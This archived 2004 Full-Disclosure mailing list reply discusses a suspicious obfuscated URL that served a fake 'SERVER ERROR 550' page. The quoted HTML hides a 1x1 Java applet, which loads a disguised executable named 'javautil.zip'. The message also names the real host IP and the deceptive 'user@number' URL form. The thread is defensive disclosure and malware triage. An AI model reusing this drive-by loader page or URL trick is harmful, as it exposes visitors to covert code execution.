Re: [Full-Disclosure] http://federalpolice.com:article872@1075686747

From: Erik van Straten (emvs.fd.3FB4D11C_at_cpo.tn.tudelft.nl)
Date: 02/15/04

  • Next message: Brent J. Nordquist: "Re: [Full-Disclosure] Re: W2K source "leaked"?"
    To: "Nicola Fankhauser" <nicola.fankhauser@variant.ch>
    Date: Sun, 15 Feb 2004 23:40:03 +0100
    
    

    Hi Nicola,

    It's not a zip file, not an applet, but a plain EXE file. Seems
    compressed somehow, no time to figure it out now. Dunno why Mozilla
    runs this (I don't like it).

    If something showed up in your status bar, you should definitely assume
    your box was compromised.

    Take care out there,
    Erik

    On Sun, 15 Feb 2004 20:20:11 +0100 Nicola Fankhauser wrote:
    > hi jedi
    >
    > On Sun, 2004-02-15 at 18:45, Jedi/Sector One wrote:
    > > This is equivalent to http://64.29.173.91/
    >
    > ok, and the html of the index page is as following:
    >
    > <html><body bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
    > <h2>SERVER ERROR 550</h2>
    > <applet ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></applet></body></html>
    >
    > now, the "SERVER ERROR 550" is clearly a fake - the java applet below
    > just starts fine. strangely, the 'javautil.zip' is not a valid zip-file,
    > yet 'appletviewer' and mozilla (don't know about MS IE; too dangerous :)
    > happily start the applet without any hickups or exceptions and mozilla
    > states 'Applet BlackBox started' in the status bar.
    >
    > is there anybody knowledgable interested in un-zipping, de-compiling and
    > analysing this surely malicious applet? I would like to know what
    > mozilla just executed on my behalf there... :(
    >
    > FYI, the file 'javautil.zip' attached is directly taken from the site
    > mentioned above.
    >
    > regards
    > nicola
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Brent J. Nordquist: "Re: [Full-Disclosure] Re: W2K source "leaked"?"

    Relevant Pages

    • Re: transfer file via http
      ... I'm really surprised (at Mozilla). ... You don't suppose MS did something snarky in that applet to screw them up? ... jpeg but pretty clearly was a win32 exe, which it would write to disk and then run. ... It's a nasty, nasty world out there in Win32/internet land, ...
      (microsoft.public.vb.general.discussion)
    • Re: No keyboard into in JApplet
      ... JInternalFrame in an applet. ... I am running Firefox, Epiphany, Mozilla. ... How are people writing applets that get keyboard input and work under ... That seems to suggest that the Java crew broke it and need to fix it. ...
      (comp.lang.java.gui)
    • RE: Mozilla 1.7.2 crash with java on Fedora Core 2
      ... Trying it with the applet viewer should validate the locus of the issue. ... Mozilla 1.7.2 crash with java on Fedora Core 2 ... > I used a link and the right plugin. ... Any difference in video driver? ...
      (Fedora)
    • Re: mozilla-applet-crash
      ... > Java 1.4.2). ... > with mozilla with and without server started. ... > closes immediately after calling the webpage containing the applet. ... > I could not find any hints how to solve my problem. ...
      (comp.lang.java.help)
    • [Full-Disclosure] Re: [Full-Disclosure] http://federalpolice.com:article872@1075686747
      ... Running mozilla 1.6. ... > Hi Nicola, ... > It's not a zip file, not an applet, but a plain EXE file. ...
      (Full-Disclosure)